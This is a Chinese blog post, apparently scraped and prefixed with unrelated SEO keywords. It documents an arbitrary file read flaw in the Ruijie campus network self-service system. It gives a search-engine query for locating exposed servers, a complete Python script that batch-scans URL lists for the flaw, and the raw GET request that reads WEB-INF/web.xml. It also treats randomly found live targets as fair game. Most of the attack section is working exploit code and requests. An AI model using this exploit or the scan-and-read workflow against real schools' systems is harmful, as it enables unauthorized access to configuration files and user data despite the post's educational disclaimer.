手机上怎么做自己的网站,网站设计公司怎么样,wordpress成绩查询插件,邢台信息港房产频道声明#xff1a;本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动#xff0c;将与本文档的作者或发布者无关。 一、漏洞描述
锐捷校园网自助服务系统是用于学校网络管理的一个平台#xff0c;login_judge.jsf接口存在任意文件读取… 声明本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动将与本文档的作者或发布者无关。 一、漏洞描述
锐捷校园网自助服务系统是用于学校网络管理的一个平台login_judge.jsf接口存在任意文件读取漏洞意味着攻击者可能通过特定的请求访问或下载系统上的任意文件这可能包括敏感的配置信息、用户数据等。
二、资产收集
1.使用网络空间测绘引擎搜索
鹰图检索web.body校园网自助服务系统 2.使用poc批量扫描
import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning# 禁用不安全的请求警告
requests.packages.urllib3.disable_warnings(categoryInsecureRequestWarning)# 定义颜色代码用于输出红色文本
RED \033[91m
RESET \033[0mdef check_vulnerability(url):检查目标URL是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞。:param url: 目标URLtry:# 构造攻击URL尝试访问WEB-INF目录下的web.xml文件attack_url url.rstrip(/) /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view%2e/WEB-INF/web.xml%3F# 发送GET请求不验证SSL证书设置超时时间为10秒response requests.get(attack_url, verifyFalse, timeout10)# 判断响应状态码和响应内容是否包含特定字符串if response.status_code 200 and web-app in response.text:print(f{RED}URL [{url}] 存在锐捷校园网自助服务系统login_judge任意文件读取漏洞{RESET})else:print(fURL [{url}] 不存在漏洞)except requests.exceptions.Timeout:# 捕获超时异常提示可能存在漏洞print(fURL [{url}] 请求超时可能存在漏洞)except requests.RequestException as e:# 捕获其他请求异常输出错误信息print(fURL [{url}] 请求失败 {e})def main():主函数解析命令行参数并执行漏洞检测。parser argparse.ArgumentParser(description检测目标地址是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞)parser.add_argument(-u, --url, help指定目标地址)parser.add_argument(-f, --file, help指定包含目标地址的文本文件)args parser.parse_args()if args.url:# 如果提供了单个URL参数确保其以http://或https://开头if not args.url.startswith(http://) and not args.url.startswith(https://):args.url http:// args.urlcheck_vulnerability(args.url)elif args.file:# 如果提供了文件参数逐行读取文件中的URL并进行检查with open(args.file, r) as file:urls file.read().splitlines()for url in urls:if not url.startswith(http://) and not url.startswith(https://):url http:// urlcheck_vulnerability(url)if __name__ __main__:main()cmd运行python poc.py -f url.txt 随机寻找的幸运儿 三、漏洞复现
1.构造数据包
GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view./WEB-INF/web.xml%3F HTTP/1.1
Host:ip2.数据包分析
GET: 表示这是一个HTTP GET请求。/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view./WEB-INF/web.xml%3F: 这是请求的URL路径。它包含了多个目录和文件名以及一个查询参数view。查询参数的值是./WEB-INF/web.xml%3F其中./WEB-INF/web.xml文件是Java Web应用程序的配置文件它包含了关于Web应用程序的配置信息%3F是问号?的URL编码这个查询参数是用来指定要访问的资源或执行某些操作。HTTP/1.1: 表示使用的是HTTP协议的版本1.1。Host: ip: 这是一个HTTP头字段表示请求的目标主机地址。这里的ip应该是实际的IP地址或者域名。
3.结束跑路
通过网页访问ip/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view./WEB-INF/web.xml%3F 通过yakit构建数据包访问 每篇一言心向花开何不朝夕。